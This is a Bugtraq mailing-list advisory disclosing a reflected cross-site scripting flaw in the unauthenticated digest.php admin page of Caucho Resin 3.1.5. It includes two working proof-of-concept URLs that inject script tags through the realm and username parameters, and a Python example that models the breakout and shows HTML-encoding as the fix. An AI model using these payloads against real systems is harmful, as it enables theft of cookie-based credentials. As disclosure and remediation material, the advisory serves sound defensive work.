Bugtraq mailing list archives

Caucho Technology Resin digest.php Cross Site Scripting Vulnerability
From: xuanmumu () gmail com
Date: 18 May 2010 23:18:12 -0000

This vulnerability does not require login. digest.php uses the REQUEST method in a wrong way to accept
parameters; a malicious user could submit XSS code on this page, and an attacker could use this vulnerability to
steal the victim's cookie-based authentication credentials.

exp:

http://test.com/resin-admin/digest.php?digest_attempt=1&digest_realm=";><script>alert("ZnVjayBjbnZk")</script><a&digest_username[]=
http://test.com/resin-admin/digest.php?digest_attempt=1&digest_username=";><script>alert("ZnVjayBjbnZk")</script><a

Tested on Resin Professional 3.1.5
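The URLs above work by closing the HTML attribute the parameter is reflected into (the leading `">`) and then opening a script tag. The following example is added here and is not the poster's or Caucho's code: it models that defect with a hypothetical two-field form (the real digest.php markup is not reproduced), shows the hardened rendering that HTML-encodes every reflected value, and coerces a PHP-style `name[]=` array parameter to a string before rendering. The attack URL is constructed for the example with a generic payload.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

# Hypothetical field names for the reflected form; the real digest.php markup
# is not reproduced here (assumption for this example).
FIELDS = ("digest_realm", "digest_username")

# Constructed attack URL in the shape of the advisory's URLs; the payload is a
# generic attribute/tag breakout, not the one from the post.
ATTACK_URL = (
    "http://test.com/resin-admin/digest.php?digest_attempt=1"
    '&digest_realm="><script>alert(1)</script><a&digest_username[]='
)


def params_from_url(url):
    """Parse the query string the way a PHP-style $_REQUEST handler sees it.
    A 'name[]=' key yields an array in PHP; here it is collapsed to its first
    element so every value is a plain string before rendering."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    params = {}
    for key, values in query.items():
        base = key[:-2] if key.endswith("[]") else key
        params[base] = values[0] if values else ""
    return params


def render_vulnerable(params):
    """Model of the defect the advisory describes: each parameter is copied
    verbatim into an attribute value, so a leading '">' closes the attribute
    and the tag, and whatever follows is parsed as markup."""
    return "".join(
        '<input name="%s" value="%s">\n' % (field, params.get(field, ""))
        for field in FIELDS
    )


def render_hardened(params):
    """Same form, but every reflected value is HTML-encoded with quote=True,
    so '"', '<' and '>' cannot terminate the attribute or open a tag."""
    return "".join(
        '<input name="%s" value="%s">\n'
        % (field, escape(str(params.get(field, "")), quote=True))
        for field in FIELDS
    )


def has_raw_script_tag(html):
    """Check used below: a literal '<script' in the output means the reflected
    value was interpreted as markup rather than as attribute text."""
    return "<script" in html.lower()


if __name__ == "__main__":
    params = params_from_url(ATTACK_URL)
    print("vulnerable rendering breaks out:", has_raw_script_tag(render_vulnerable(params)))
    print("hardened rendering breaks out:  ", has_raw_script_tag(render_hardened(params)))
    print(render_hardened(params))
```

The encoding has to happen at the point where the value is written into HTML, and with quotes included: encoding only `<` and `>` still leaves the `"` breakout, and encoding earlier (at parameter intake) breaks legitimate values that are later used outside HTML. Collapsing the array form to a string matters because a template that stringifies an array may emit something unexpected rather than rejecting it.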


Current thread:
  • Caucho Technology Resin digest.php Cross Site Scripting Vulnerability xuanmumu (May 19)